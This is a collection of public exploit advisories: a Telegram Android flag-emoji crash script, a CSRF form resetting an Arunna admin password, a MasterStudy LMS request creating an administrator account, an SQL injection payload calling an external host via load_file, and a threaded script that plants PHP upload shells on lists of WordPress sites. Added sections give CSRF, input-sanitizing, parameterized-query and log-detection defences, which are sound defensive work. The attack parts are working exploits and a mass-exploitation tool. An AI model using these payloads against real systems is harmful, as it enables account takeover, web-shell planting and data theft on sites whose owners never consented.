<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. 
In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered a denial of service<br />vulnerability in the Telegram Android application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />=========================================<br />1.1<br />In version 8.4.4 of the Android Telegram application, a denial of service<br />vulnerability was discovered by H4shur. 
The vulnerability is in the emoji handling of<br />this messenger.<br /><br />1.2<br />If you send a number of flag emojis together with any text on the chat page,<br />clicking on that message will crash the application altogether and stop<br />it from providing its services.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br />For a security demonstration or to reproduce the denial of service<br />vulnerability, follow the provided information and steps below.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the Python script; it will create a new file "outputbufferh4shur.txt".<br />1.2<br />Run Telegram Android and go to "Saved Messages" or any chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..." field<br />and then type any text into this message.<br />1.5<br />Oops...<br />Telegram Crashed <3<br /><br /><br />script:<br /># Builds the PoC message: 114 copies of one regional-indicator flag emoji<br /># (each flag is two Unicode code points), written as UTF-8 to a text file.<br />bufferh4shur = "🇮🇷" * 114<br />try:<br />    with open("outputbufferh4shur.txt", "w", encoding="utf-8") as f:<br />        print("[!] Creating DOS payload of %d characters...." % len(bufferh4shur))<br />        f.write(bufferh4shur)<br />    print("[!] File Created!")<br />except OSError as e:<br />    print("File cannot be created! (%s)" % e)<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" 
value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
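The CSRF form above works because the admin edit endpoint accepts any POST that carries the victim's session cookie. The following is an added example, not code from the advisory or from the Arunna project, showing the server-side check that defeats it: a per-session token the cross-site page cannot read, compared in constant time, plus an Origin/Referer check as a second layer. The origin `https://admin.example.test` and the session/form dicts are constructed placeholders; `simulate()` replays the advisory's scenario (a victim with a live session, an attacker-controlled form posting the same field names) against that check.

```python
import hmac
import secrets

# Constructed placeholder for the site the admin panel is served from (not from the advisory).
ALLOWED_ORIGIN = "https://admin.example.test"


def issue_csrf_token(session: dict) -> str:
    """Create an unguessable per-session token and keep a copy server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_same_origin(headers: dict, allowed_origin: str) -> bool:
    """Secondary defence: the browser-set Origin (or, failing that, Referer) must match our site."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == allowed_origin
    referer = headers.get("Referer", "")
    return referer == allowed_origin or referer.startswith(allowed_origin + "/")


def authorize_state_change(session: dict, form: dict, headers: dict,
                           allowed_origin: str = ALLOWED_ORIGIN) -> bool:
    """Allow a state-changing POST only with the session's token AND a matching origin."""
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token")
    if not expected or not submitted:
        return False
    if not hmac.compare_digest(expected, submitted):  # constant-time compare
        return False
    return is_same_origin(headers, allowed_origin)


def simulate() -> dict:
    """Replay the advisory's scenario: a logged-in victim and a cross-site auto-submitting form."""
    session = {"user_id": 1}
    token = issue_csrf_token(session)
    # The attacker's page can make the browser send the victim's cookie but cannot read the token.
    forged_form = {"username[0]": "admin", "password[0]": "admin12345",
                   "re_password[0]": "admin12345", "save_changes": "Save User"}
    forged_headers = {"Origin": "https://attacker.example.test", "Cookie": "PHPSESSID=victim"}
    # The legitimate edit form rendered by the application embeds the token as a hidden field.
    legit_form = dict(forged_form, csrf_token=token)
    legit_headers = {"Origin": ALLOWED_ORIGIN, "Cookie": "PHPSESSID=victim"}
    return {
        "forged_no_token": authorize_state_change(session, forged_form, forged_headers),
        "forged_guessed_token": authorize_state_change(session, dict(forged_form, csrf_token="guess"), forged_headers),
        "legit": authorize_state_change(session, legit_form, legit_headers),
        "stolen_token_wrong_origin": authorize_state_change(session, legit_form, forged_headers),
    }


if __name__ == "__main__":
    for case, allowed in simulate().items():
        print(f"{case}: {'allowed' if allowed else 'rejected'}")
```

Marking the session cookie `SameSite=Lax` or `Strict` is a cheap additional layer, but the token check is the one that does not depend on browser behaviour.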
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
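The request above is a mass-assignment flaw: a nested `profile_default_fields_for_register` object carrying `wp_capabilities` is accepted from an unauthenticated client and applied to the new account. The following is an added example, not the plugin's code or the vendor's fix, of the server-side handling that prevents it: allowlist the top-level registration fields, refuse any privileged key at any nesting depth, and assign the role server-side. The field names come from the request body shown in the advisory; the `PRIVILEGED_KEYS` set, `DEFAULT_ROLE`, and the placeholder values in `MALICIOUS_BODY` are constructed for the example.

```python
import json

# Field names taken from the request body shown in the advisory; everything else is constructed.
ALLOWED_REGISTRATION_FIELDS = {
    "user_login", "user_email", "user_password", "user_password_re",
    "become_instructor", "privacy_policy", "degree", "expertize",
    "auditory", "additional", "additional_instructors",
}
# Keys that must never be settable by an unauthenticated client, at any nesting depth.
PRIVILEGED_KEYS = {"wp_capabilities", "capabilities", "role", "roles", "user_level"}
DEFAULT_ROLE = "subscriber"  # assigned server-side, never derived from the request


class RegistrationRejected(ValueError):
    pass


def find_privileged_key(obj, path=()):
    """Walk dicts and lists; return the path of the first privileged key found, else None."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = path + (str(key),)
            if str(key).lower() in PRIVILEGED_KEYS:
                return here
            hit = find_privileged_key(value, here)
            if hit:
                return hit
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            hit = find_privileged_key(value, path + (str(index),))
            if hit:
                return hit
    return None


def sanitize_registration(payload: dict) -> dict:
    """Allowlist top-level fields, refuse privileged keys anywhere, and fix the role server-side."""
    hit = find_privileged_key(payload)
    if hit:
        raise RegistrationRejected("privileged key at " + "/".join(hit))
    unknown = sorted(set(payload) - ALLOWED_REGISTRATION_FIELDS)
    if unknown:
        raise RegistrationRejected("unexpected field(s): " + ", ".join(unknown))
    if payload.get("user_password") != payload.get("user_password_re"):
        raise RegistrationRejected("password confirmation mismatch")
    clean = {k: payload[k] for k in ALLOWED_REGISTRATION_FIELDS if k in payload}
    clean["role"] = DEFAULT_ROLE
    return clean


# Constructed copy of the advisory's request body with placeholder values.
MALICIOUS_BODY = json.loads(
    '{"user_login":"USERNAME","user_email":"user@example.test","user_password":"PASSWORD",'
    '"user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"",'
    '"expertize":"","auditory":"","additional":[],"additional_instructors":[],'
    '"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}'
)


def classify(payload: dict) -> str:
    """Return 'accepted:<role>' or 'rejected:<reason>' for a registration body."""
    try:
        return "accepted:" + sanitize_registration(payload)["role"]
    except RegistrationRejected as exc:
        return "rejected:" + str(exc)


if __name__ == "__main__":
    print(classify(MALICIOUS_BODY))
```

The rejection path is also the detection hook: log the offending key path and source address, since a registration body that names `wp_capabilities` is never produced by the legitimate form.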
<pre><code>## Title: Child's Day Care Management System 1.0 - SQL Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` parameter of Login.php in Child's Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. This system is also vulnerable to<br />SQL injection authentication bypass<br />and stored XSS attacks. An attacker can retrieve all information<br />from the system by using these vulnerabilities! 
Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
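The advisory's evidence is an out-of-band callback: a `load_file()` subquery spliced into the `username` value executed, so the login query must be built by string concatenation. The following is an added example, not code from the advisory or from the Child's Day Care Management System, contrasting that flawed query shape with a parameterized one. It uses an in-memory `sqlite3` database as a stand-in for MySQL (the query shapes are the same), a constructed `canary()` SQL function playing the role of the advisory's external `load_file()` probe, a constructed `admin` user, and a probe username in the style of the advisory's payload. `hash_password` is a SHA-256 stand-in; a real login would use a slow, salted KDF.

```python
import hashlib
import hmac
import sqlite3


class Canary:
    """Records whether SQL text the application never wrote actually ran (like the advisory's UNC callback)."""

    def __init__(self):
        self.fired = 0

    def __call__(self):
        self.fired += 1
        return 1


def hash_password(password: str) -> str:
    # Constructed stand-in; use bcrypt/argon2/scrypt with a per-user salt in a real application.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def setup_demo_db():
    """In-memory sqlite3 standing in for MySQL, with one constructed user and the canary function."""
    conn = sqlite3.connect(":memory:")
    canary = Canary()
    conn.create_function("canary", 0, canary)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)")
    conn.execute("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                 ("admin", hash_password("correct horse battery")))
    conn.commit()
    return conn, canary


def login_unsafe(conn, username: str, password: str) -> bool:
    """The flawed shape described in the advisory: user input concatenated into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password_hash = '" + hash_password(password) + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Hardened shape: bound parameter for the lookup, constant-time compare for the secret."""
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], hash_password(password))


def probe(login, conn, username: str, password: str) -> str:
    """Classify what a login implementation does with an input: authenticated / denied / sql_error."""
    try:
        return "authenticated" if login(conn, username, password) else "denied"
    except sqlite3.DatabaseError:
        return "sql_error"


# Constructed inputs in the style of the advisory's payload: a lone quote (the syntax-error
# symptom scanners look for) and a quote + subquery that calls the canary.
QUOTE_PROBE = "zCAMOHlX'"
SUBQUERY_PROBE = "zCAMOHlX'+(select canary())+'"


def compare() -> dict:
    conn, canary = setup_demo_db()
    results = {
        "quote_unsafe": probe(login_unsafe, conn, QUOTE_PROBE, "x"),
        "quote_safe": probe(login_safe, conn, QUOTE_PROBE, "x"),
        "subquery_unsafe": probe(login_unsafe, conn, SUBQUERY_PROBE, "x"),
    }
    results["canary_fired_by_unsafe"] = canary.fired
    results["subquery_safe"] = probe(login_safe, conn, SUBQUERY_PROBE, "x")
    results["canary_fired_by_safe"] = canary.fired - results["canary_fired_by_unsafe"]
    results["safe_valid"] = probe(login_safe, conn, "admin", "correct horse battery")
    results["safe_wrong_password"] = probe(login_safe, conn, "admin", "nope")
    return results


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

With the parameterized query the quote and the subquery are just bytes of a username that does not exist: no syntax error, no canary call, and nothing for a time-based or out-of-band probe to observe.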
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset=True)<br />fr = Fore.RED<br />gr = Fore.BLUE<br />fc = Fore.CYAN<br />fw = Fore.WHITE<br />fy = Fore.YELLOW<br />fg = Fore.GREEN<br />sd = Style.DIM<br />sn = Style.NORMAL<br />sb = Style.BRIGHT<br />Bad = 0<br />Good = 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder("exploited")<br />def clear():<br /> try:<br /> if os.name == 'nt':<br /> os.system('cls')<br /> else:<br /> os.system('clear')<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}<br /> try :<br /> x = requests.session()<br /> listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']<br /> for script in listaa :<br /> url = (i+"/"+script)<br /> while True :<br /> req_first = x.get(url, headers=head)<br /> if "error:http raw post data does not exist" in req_first.text :<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}<br 
/> burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"<br /> requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)<br /> urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")<br /> req_second = x.get(urlx, headers=head)<br /> if "Overthinker1877" in req_second.text :<br /> Good = Good + 1<br /> print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)<br /> with open("exploited/shell.txt","a") as file :<br /> file.write(urlx+"\n")<br /> file.close()<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name == 'nt':<br /> ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))<br /> else :<br /> sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))<br /><br />def key_logo():<br /> clear = '\x1b[0m'<br /> colors = [36, 32, 34, 35, 31, 37]<br /> x = ' [ + ] OVERTHINKER1877 EXPLOIT'<br /> for N, line in enumerate(x.split('\n')):<br /> sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(""" <br /> [-] -----------------------------------------[-]<br /> [+] WwW.1877.TeaM<br /> [-] -----------------------------------------[-]<br /> \n \n""")<br /> file_name = input("Website List : ")<br /> op = open(file_name,'r').read().splitlines()<br /> 
TEXTList = [list.strip() for list in op]<br /> p = Pool(int(input('Thread : ')))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>
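The script above leaves a distinctive three-step trail in a web server's access log: a request to `savepng.php` with a `location=` value ending in `.php`, a POST to the same URL, and then a GET of that newly named file (with a doubled slash, because the script joins `i + "/" + "/wp-content/..."`). The following is an added example, not part of the exploit or of the plugin, of detection logic a defender can run over access logs: it parses Apache/nginx combined-format lines (an assumed format), normalizes repeated slashes, flags write attempts and raw POSTs to `savepng.php`, and correlates a later successful request for the staged file name from the same source address. The log lines in `SAMPLE_LOG` are constructed, not captured traffic; the addresses are documentation ranges.

```python
import re
from urllib.parse import parse_qs, unquote

PLUGIN_DIR = "/wp-content/plugins/dzs-zoomsounds/"
# Apache/nginx "combined" access-log format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line: str):
    """Return ip, ts, method, normalized path, query dict and status for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Split manually rather than with urlsplit(): a leading '//' would be parsed as a host.
    raw_path, _, raw_query = rec["target"].partition("?")
    rec["path"] = re.sub(r"/+", "/", unquote(raw_path))  # collapse '//' as the script produces it
    rec["query"] = parse_qs(raw_query)
    return rec


def detect(lines):
    """Flag the savepng.php write chain and correlate later access to the staged file name."""
    findings = []
    staged = {}  # source ip -> file names passed via location=
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(PLUGIN_DIR):
            continue
        name = rec["path"][len(PLUGIN_DIR):]
        if name == "savepng.php":
            for loc in rec["query"].get("location", []):
                if loc.lower().endswith(".php") or ".." in loc or "/" in loc:
                    findings.append((rec["ip"], "savepng_php_write_attempt", loc))
                    staged.setdefault(rec["ip"], set()).add(loc.rsplit("/", 1)[-1])
            if rec["method"] == "POST":
                findings.append((rec["ip"], "savepng_raw_post", rec["target"]))
        elif name in staged.get(rec["ip"], set()) and rec["status"] == "200":
            findings.append((rec["ip"], "dropped_file_served", rec["path"]))
    return findings


# Constructed sample lines (not real traffic) following the request sequence of the script above,
# plus benign traffic from a second address that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Feb/2022:10:00:01 +0000] "GET /wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Feb/2022:10:00:02 +0000] "POST /wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Feb/2022:10:00:03 +0000] "GET //wp-content/plugins/dzs-zoomsounds/1877.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Feb/2022:10:05:00 +0000] "GET /wp-content/plugins/dzs-zoomsounds/savepng.php?location=waveform.png HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Feb/2022:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, kind, detail in detect(SAMPLE_LOG):
        print(f"{ip} {kind} {detail}")
```

A `dropped_file_served` finding is the one to page on: it means the write succeeded and the file is being executed, so the response is to remove the file, check the plugin directory for other recently written `.php` files, and update or remove the plugin.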